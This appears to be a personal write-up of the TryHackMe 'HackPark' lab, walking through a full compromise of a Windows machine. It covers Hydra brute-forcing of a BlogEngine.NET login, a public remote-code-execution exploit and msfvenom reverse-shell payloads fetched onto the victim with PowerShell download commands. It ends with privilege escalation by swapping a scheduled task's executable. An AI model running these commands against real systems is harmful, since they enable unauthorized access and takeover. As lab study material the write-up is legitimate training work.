Xuptox

HackPark

Bruteforce a websites login with Hydra, identify and use a public exploit then escalate your privileges on this Windows machine!

Windows CVE RCE Metasploit winPEAS Hydra

Room Description

Bruteforce a websites login with Hydra, identify and use a public exploit then escalate your privileges on this Windows machine! Find THM room here

Used Commands 

hydra -l <username> -P <path to wordlist> <target ip> http-post-form <payload>
searchsploit <search name>
nc -lvnp <listener port>
python3 -m http.server <webserver port>

msfvenom --list payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<listener ip> LPORT=<listener port> -f exe > shell.exe
msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=<listener ip> LPORT=<listener port> -f exe -o <output filename>
msfvenom -p <payload> -a <architecture> --encoder /x86/shikata_ga_nai LHOST=<listener ip> LPORT=<listener port> -f exe -o <output filename>

getuid
powershell -c "Invoke-WebRequest -Uri 'http://<webserver ip>:<webserver port>/<filename>' -OutFile '<output filename>'"
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<webserver ip>:<webserver port>/<filename>','<output filename')"
ren <filename> <new filename>

Task 1

Google:
Who’s the clown?

A quick search on the source of code didn’t give me any hints.
So I searched on google and finally found the name.

Task 2

Find the login page in the menu. This gives us some more knowledge about the used components.

Hydra:
Brute-forcing a password

Before I started using Hydra I did a quick search on google and tried to find some default credentials.

Username Password
admin admin
admin Passw@rd123

Unfortunately, this didn’t work out so let’s continue with Hydra.

hydra -l admin -P /usr/share/wordlists/rockyou.txt <target ip> http-post-form <payload>
Parameter Description
-l <username>
-P <wordslist>
<payload> everything starting
from __VIEWSTATE=...
to ...LoginButton=Log+in
check the following screenshot

If everything worked you should receive something like this

[80][http-post-form] host: 10.10.9.86   login: admin   password: 1qaxxxxx
1 of 1 target successfully completed, 1 valid password found

Burp-Suite:
Brute-forcing a password

Burp-Suites Intruder is another option guessing passwords. The Source code of the login page shows that this login seems to be for an administrator. So I decided to start with “admin” as username and any password wordlist you can find.

You should give it a try.

Burp-Suite:
Request type of login form

Checkout the source code of the webpage or if you used Burp Suite check the request when you try to login with any credentials.

Task 3

Check out the about page from the sidebar to find the current version of BlogEngine

SearchSploit: Find exploits

What is the CVE Version? You will get multiple reports when you search for BlogEngine.NET.

searchsploit BlogEngine.NET
Result of search with searchsploit

3 of them are regarding remote code execution (that’s what we are striving for) but only 1 of them is valid. Go and find the right one or try them all.

Gain a reverse shell

Copy the file to your working directory. Copy exploit file to working directory

Before we answer the next question we need to gain access to the server. Let’s run that exploit

vim 46353.cs

  • Change the <listener ip> and <listener port> Changes on exploit file: IP and Port

  • Setup a netcat listener on that port nc -lvnp <listener port>

  • Rename exploit file to PostView.ascx

  • Upload the file on the target server by editing a post (read the description)
    http://<target ip>/admin/app/editor/editpost.cshtml Screenshot of the icon to use to upload a file Confirmation the file was uploaded

  • Use the browser to access the base URL like so:
    http://<target ip>/?theme=../../App_Data/files

whoami will answer the next question
Who is the web server running as?

Established reverse shell with running whoami: iis apppool\blog

Task 4 (Metasploit)

Compromise the machine

Let’s create a better shell using msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<listener ip> LPORT=9001 -f exe > shell.exe
Creation of reverse shell executable with msfvenom

Setup a http.server on the attacker machine. I used python3 and http.server for this.

python3 -m http.server 8000

Use the existing reverse shell and download the shell.exe on the victim machine using PowerShell.

powershell "(New-Object System.Net.WebClient).Downloadfile('http://<webserver ip>:8000/shell.exe','shell.exe')"
python3 webserver on port 8000

Before executing shell.exe let’s start Metasploit and setup a meterpreter/reverse_shell_tcp

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp

Check options and set the required parameters.

set LHOST <atk ip>
set LPORT 9001
run
Options on metasploit multi/handler with meterpreter/reverse_tcp payload

Use run to start the listener. If everything is correct you should now see a message like this:

[*] Started reverse TCP handler on 10.10.219.52:9001

Run shell.exe on the victim machine

shell.exe
Incoming connection from target

What’s the OS version?

As soon as you are connected with the new meterpreter shell, run sysinfo to get the OS version. Printed sysinfo

WinPEAS:
Enumeration

If you do not have WinPEAS already stored on your machine, you can do this now. A quick search on google will give you all the information you need.

Use the same method as used in the last step to get winPEAS.bat transferred to the target machine.

Switch to meterpreter shell 
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<webserver ip>:8000/winPEAS.bat','winPEAS.bat')"
List of files in temp folder

Run winPEAS.bat

Any suspicious service running?

Have a look at the output of winPEAS (RUNNING PROCESSES is what we are searching for)

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] RUNNING PROCESSES <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Something unexpected is running? Check for vulnerabilities
 [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
smss.exe                       376 N/A
csrss.exe                      524 N/A
csrss.exe                      580 N/A
wininit.exe                    588 N/A
winlogon.exe                   616 N/A
services.exe                   680 N/A
lsass.exe                      688 SamSs
svchost.exe                    748 BrokerInfrastructure, DcomLaunch, LSM,
                                   PlugPlay, Power, SystemEventsBroker
svchost.exe                    792 RpcEptMapper, RpcSs
dwm.exe                        872 N/A
svchost.exe                    888 Dhcp, EventLog, lmhosts, Wcmsvc
svchost.exe                    916 AeLookupSvc, CertPropSvc, DsmSvc, gpsvc,
                                   iphlpsvc, LanmanServer, ProfSvc, Schedule,
                                   SENS, SessionEnv, ShellHWDetection, Themes,
                                   Winmgmt
svchost.exe                    972 EventSystem, FontCache, netprofm, nsi,
                                   W32Time, WinHttpAutoProxySvc
svchost.exe                    360 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc, WinRM
svchost.exe                    848 BFE, DPS, MpsSvc
spoolsv.exe                   1148 Spooler
amazon-ssm-agent.exe          1180 AmazonSSMAgent
svchost.exe                   1256 AppHostSvc
LiteAgent.exe                 1276 AWSLiteAgent
svchost.exe                   1372 TrkWks, UALSVC, UmRdpService
svchost.exe                   1388 W3SVC, WAS
WService.exe                  1416 WindowsScheduler
WScheduler.exe                1556 N/A
Ec2Config.exe                 1656 Ec2Config
WmiPrvSE.exe                  1748 N/A
svchost.exe                   1432 TermService
taskhostex.exe                2584 N/A
explorer.exe                  2656 N/A
ServerManager.exe             2360 N/A
WScheduler.exe                1804 N/A
msdtc.exe                     1888 MSDTC
w3wp.exe                      2520 N/A
cmd.exe                       1564 N/A
conhost.exe                   2116 N/A
shell.exe                     1860 N/A
cmd.exe                       2132 N/A
conhost.exe                    924 N/A
WmiPrvSE.exe                  1864 N/A
TrustedInstaller.exe          1948 TrustedInstaller
TiWorker.exe                  1356 N/A
tasklist.exe                  2668 N/A

Head over to the SystemScheduler folder.

cd "c:\Program Files (x86)\SystemScheduler"

Check out the read, write, execute permissions! That looks great!

meterpreter > ls
Listing: c:\Program Files (x86)\SystemScheduler
===============================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40777/rwxrwxrwx   4096     dir   2019-08-04 11:36:53 +0000  Events
100666/rw-rw-rw-  60       fil   2019-08-04 11:36:42 +0000  Forum.url
100666/rw-rw-rw-  9813     fil   2019-08-04 11:36:42 +0000  License.txt
100666/rw-rw-rw-  1496     fil   2019-08-04 11:37:02 +0000  LogFile.txt
100666/rw-rw-rw-  3760     fil   2019-08-04 11:36:53 +0000  LogfileAdvanced.txt
100777/rwxrwxrwx  536992   fil   2019-08-04 11:36:42 +0000  Message.exe
100777/rwxrwxrwx  445344   fil   2019-08-04 11:36:42 +0000  PlaySound.exe
100777/rwxrwxrwx  27040    fil   2019-08-04 11:36:42 +0000  PlayWAV.exe
100666/rw-rw-rw-  149      fil   2019-08-04 11:36:53 +0000  Preferences.ini
100777/rwxrwxrwx  485792   fil   2019-08-04 11:36:42 +0000  Privilege.exe
100666/rw-rw-rw-  10100    fil   2019-08-04 11:36:42 +0000  ReadMe.txt
100777/rwxrwxrwx  112544   fil   2019-08-04 11:36:42 +0000  RunNow.exe
100777/rwxrwxrwx  235936   fil   2019-08-04 11:36:42 +0000  SSAdmin.exe
100777/rwxrwxrwx  731552   fil   2019-08-04 11:36:42 +0000  SSCmd.exe
100777/rwxrwxrwx  456608   fil   2019-08-04 11:36:42 +0000  SSMail.exe
100777/rwxrwxrwx  1633696  fil   2019-08-04 11:36:42 +0000  Scheduler.exe
100777/rwxrwxrwx  491936   fil   2019-08-04 11:36:42 +0000  SendKeysHelper.exe
100777/rwxrwxrwx  437664   fil   2019-08-04 11:36:42 +0000  ShowXY.exe
100777/rwxrwxrwx  439712   fil   2019-08-04 11:36:42 +0000  ShutdownGUI.exe
100666/rw-rw-rw-  785042   fil   2019-08-04 11:36:42 +0000  WSCHEDULER.CHM
100666/rw-rw-rw-  703081   fil   2019-08-04 11:36:42 +0000  WSCHEDULER.HLP
100777/rwxrwxrwx  136096   fil   2019-08-04 11:36:42 +0000  WSCtrl.exe
100777/rwxrwxrwx  68512    fil   2019-08-04 11:36:42 +0000  WSLogon.exe
100666/rw-rw-rw-  33184    fil   2019-08-04 11:36:42 +0000  WSProc.dll
100666/rw-rw-rw-  2026     fil   2019-08-04 11:36:42 +0000  WScheduler.cnt
100777/rwxrwxrwx  331168   fil   2019-08-04 11:36:42 +0000  WScheduler.exe
100777/rwxrwxrwx  98720    fil   2019-08-04 11:36:42 +0000  WService.exe
100666/rw-rw-rw-  54       fil   2019-08-04 11:36:42 +0000  Website.url
100777/rwxrwxrwx  76704    fil   2019-08-04 11:36:42 +0000  WhoAmI.exe
100666/rw-rw-rw-  1150     fil   2019-08-04 11:36:42 +0000  alarmclock.ico
100666/rw-rw-rw-  766      fil   2019-08-04 11:36:42 +0000  clock.ico
100666/rw-rw-rw-  80856    fil   2019-08-04 11:36:42 +0000  ding.wav
100666/rw-rw-rw-  1637972  fil   2019-08-04 11:36:42 +0000  libeay32.dll
100777/rwxrwxrwx  40352    fil   2019-08-04 11:36:42 +0000  sc32.exe
100666/rw-rw-rw-  766      fil   2019-08-04 11:36:42 +0000  schedule.ico
100666/rw-rw-rw-  355446   fil   2019-08-04 11:36:42 +0000  ssleay32.dll
100666/rw-rw-rw-  6999     fil   2019-08-04 11:36:42 +0000  unins000.dat
100777/rwxrwxrwx  722597   fil   2019-08-04 11:36:42 +0000  unins000.exe
100666/rw-rw-rw-  6574     fil   2019-08-04 11:36:42 +0000  whiteclock.ico

Let’s dig deeper into Events folder and check some log files.

meterpreter > cd Events
meterpreter > ls
Listing: c:\Program Files (x86)\SystemScheduler\Events
======================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  1926   fil   2019-08-04 22:05:19 +0000  20198415519.INI
100666/rw-rw-rw-  27140  fil   2019-08-04 22:06:01 +0000  20198415519.INI_LOG.txt
100666/rw-rw-rw-  290    fil   2020-10-02 21:50:12 +0000  2020102145012.INI
100666/rw-rw-rw-  186    fil   2021-04-18 10:02:05 +0000  Administrator.flg
100666/rw-rw-rw-  182    fil   2021-04-18 10:01:36 +0000  SYSTEM_svc.flg
100666/rw-rw-rw-  0      fil   2021-04-18 10:02:05 +0000  Scheduler.flg
100666/rw-rw-rw-  449    fil   2019-08-04 11:36:53 +0000  SessionInfo.flg
100666/rw-rw-rw-  0      fil   2021-04-18 10:01:36 +0000  service.flg

While you check the log files you will find this:

meterpreter > cat 20198415519.INI_LOG.txt
...
04/18/21 04:13:34,Process Ended. PID:2376,ExitCode:4,Message.exe (Administrator)
04/18/21 04:14:01,Event Started Ok, (Administrator)
04/18/21 04:14:34,Process Ended. PID:2880,ExitCode:4,Message.exe (Administrator)
04/18/21 04:15:01,Event Started Ok, (Administrator)
04/18/21 04:15:33,Process Ended. PID:2604,ExitCode:4,Message.exe (Administrator)
04/18/21 04:16:01,Event Started Ok, (Administrator)
04/18/21 04:16:33,Process Ended. PID:2556,ExitCode:4,Message.exe (Administrator)
04/18/21 04:17:00,Event Started Ok, (Administrator)
04/18/21 04:17:34,Process Ended. PID:2400,ExitCode:4,Message.exe (Administrator)
04/18/21 04:18:01,Event Started Ok, (Administrator)
04/18/21 04:18:34,Process Ended. PID:2956,ExitCode:4,Message.exe (Administrator)
04/18/21 04:19:01,Event Started Ok, (Administrator)
meterpreter >

There is a service running every 30 seconds. Check the user. Great! Let’s get root now.

Root the machine

Replace Message.exe with our renamed shell.exe Use the python webserver setup earlier to download the shell into the SystemScheduler folder.

meterpreter > shell
Process 2628 created.
Channel 8 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
c:\Program Files (x86)\SystemScheduler>powershell -c "Invoke-WebRequest -Uri 'http://<webserver ip>:8000/shell.exe' -OutFile 'c:\Program Files (x86)\SystemScheduler\shell.exe'"

In Metasploit:

  • Background the current channel
c:\Program Files (x86)\SystemScheduler>^Z
Background channel 8? [y/N]  y
meterpreter > pwd
c:\Program Files (x86)\SystemScheduler
  • Rename Message.exe to Message.exe.bak
meterpreter > mv Message.exe Message.exe.bak
  • Rename shell.exe to Message.exe
meterpreter > mv shell.exe Message.exe
  • Background the current session ctrl + z and run the previous multi/handler again
meterpreter >
Background session 1? [y/N]  y
[-] Unknown command: y.
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.219.52:9001

Within 30 seconds WindowsScheduler will run Message.exe that was replaced by our venomous shell.exe. As the task is executed as Administrator a reverse shell with corresponding permissions will be established.

[*] Sending stage (176195 bytes) to 10.10.75.91
[*] Meterpreter session 2 opened (10.10.219.52:9001 -> 10.10.75.91:49304) at 2021-04-18 11:30:01 +0000

meterpreter > getuid
Server username: HACKPARK\Administrator

Congrats! You have root.

Task 5 (w/o Metasploit)

Use the same exploit to gain an initial reverse shell. Setup a netcat listener nc -lvnp 4445.

root@kali:~/Desktop/HackPark# nc -lvnp 4445
listening on [any] 4445 ...

Use the browser to establish the initial reverse shell.
http://<target ip>/admin/app/editor/editpost.cshtml

listening on [any] 4445 ...
connect to [10.10.219.52] from (UNKNOWN) [10.10.75.91] 49313
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

Compromise the machine

The target is to root by using windows/shell_reverse_tcp (instead of meterpreter which was used in Task 4). Create a venomous shell.exe with a different payload.

root@kali:~/Desktop/HackPark# msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=10.10.219.52 LPORT=9001 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] Skipping invalid encoder /x86/shikata_ga_nai
[!] Couldn't find encoder to use
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe

Move the file to target A simple http.server will serve for this

On your attacker machine:

root@kali:~/Desktop/HackPark# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Root the machine

Switch to the victim’s machine and change the current directory to c:\Program Files (x86)\SystemScheduler.

cd c:\Program Files (x86)\SystemScheduler

Download generated shell.exe and winPEAS.bat onto the victim machine.

powershell -c "Invoke-WebRequest -Uri 'http://<webserver ip>:8000/shell.exe' -OutFile 'shell.exe'"
powershell -c "Invoke-WebRequest -Uri 'http://<webserver ip>:8000/winPEAS.bat' -OutFile 'winPEAS.bat'"

Start a netcat listener on your machine. For better stability, I used rlwrap around.

root@kali:~/Desktop/HackPark# rlwrap nc -lvnp 9001
listening on [any] 9001 ...

Rename Message.exe

ren "Message.exe" "Message.exe.bak"
c:\Program Files (x86)\SystemScheduler>ren "Message.exe" "Message.exe.bak"

Finally, rename the uploaded shell.exe on the target machine to Message.exe

ren "shell.exe" "Message.exe"
c:\Program Files (x86)\SystemScheduler>ren "shell.exe" "Message.exe"

Wait for WindowsScheduler to run our new Message.exe

root@kali:~# rlwrap nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.219.52] from (UNKNOWN) [10.10.181.219] 49214
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\PROGRA~2\SYSTEM~1>echo %username%
echo %username%
Administrator

Congrats! You have root.

← GameZone